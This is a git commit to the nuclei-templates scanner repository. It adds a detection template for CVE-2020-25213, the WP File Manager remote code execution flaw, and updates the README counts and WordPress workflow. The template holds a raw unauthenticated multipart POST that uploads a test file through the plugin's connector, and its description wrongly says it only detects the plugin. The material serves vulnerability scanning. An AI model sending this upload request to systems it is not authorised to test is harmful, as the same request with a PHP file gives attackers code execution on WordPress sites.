Merge pull request #844 from projectdiscovery/CVE-2020-25213

Added CVE-2020-25213
2021-02-12 00:54:41 +05:30 · 2021-02-12 00:54:41 +05:30 · 520001d617
parent 6743adbeed e30bbd89ca
commit 520001d617
3 changed files with 66 additions and 2 deletions
--- a/README.md
+++ b/README.md
@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc

 | Templates       | Counts                          | Templates        | Counts                         |
 | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves            | 175            | default-logins   | 8 |
+| cves            | 176            | default-logins   | 8 |
 | dns             | 6               | exposed-panels   | 74   |
 | exposed-tokens  | 9  | exposures        | 43      |
 | fuzzing         | 4           | helpers          | 2        |
@ -188,6 +188,7 @@ An overview of the nuclei template directory including number of templates assoc
 │   │   ├── CVE-2020-24223.yaml
 │   │   ├── CVE-2020-24312.yaml
 │   │   ├── CVE-2020-24579.yaml
+│   │   ├── CVE-2020-25213.yaml
 │   │   ├── CVE-2020-2551.yaml
 │   │   ├── CVE-2020-25540.yaml
 │   │   ├── CVE-2020-26214.yaml
@ -628,7 +629,7 @@ An overview of the nuclei template directory including number of templates assoc

 </details>

-**55 directories, 526 files**.
+**55 directories, 527 files**.

 📖 Documentation
 -----
--- a/cves/2020/CVE-2020-25213.yaml
+++ b/cves/2020/CVE-2020-25213.yaml
@ -0,0 +1,62 @@
+id: CVE-2020–25213
+
+info:
+  name: WP File Manager RCE
+  author: foulenzer
+  severity: critical
+  description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
+  tags: cve,cve2020,wordpress,rce
+
+  # Uploaded file will be accessible at:-
+  # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
+
+requests:
+  - raw:
+      - |
+        POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Length: 608
+        Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
+        Connection: close
+
+        --------------------------ca81ac1fececda48
+        Content-Disposition: form-data; name="reqid"
+
+        17457a1fe6959
+        --------------------------ca81ac1fececda48
+        Content-Disposition: form-data; name="cmd"
+
+        upload
+        --------------------------ca81ac1fececda48
+        Content-Disposition: form-data; name="target"
+
+        l1_Lw
+        --------------------------ca81ac1fececda48
+        Content-Disposition: form-data; name="mtime[]"
+
+        1576045135
+        --------------------------ca81ac1fececda48
+        Content-Disposition: form-data; name="upload[]"; filename="poc.txt"
+        Content-Type: text/plain
+
+        poc-test
+        --------------------------ca81ac1fececda48--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - poc.txt
+          - added
+        condition: and
+
+      - type: word
+        words:
+          - application/json
+        part: header
+
+      - type: status
+        status:
+          - 200
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@ -16,6 +16,7 @@ workflows:
          - template: cves/2019/CVE-2019-15858.yaml
          - template: cves/2019/CVE-2019-6715.yaml
          - template: cves/2019/CVE-2019-9978.yaml
+          - template: cves/2020/CVE-2020-25213.yaml
          - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
          - template: vulnerabilities/wordpress/sassy-social-share.yaml
          - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml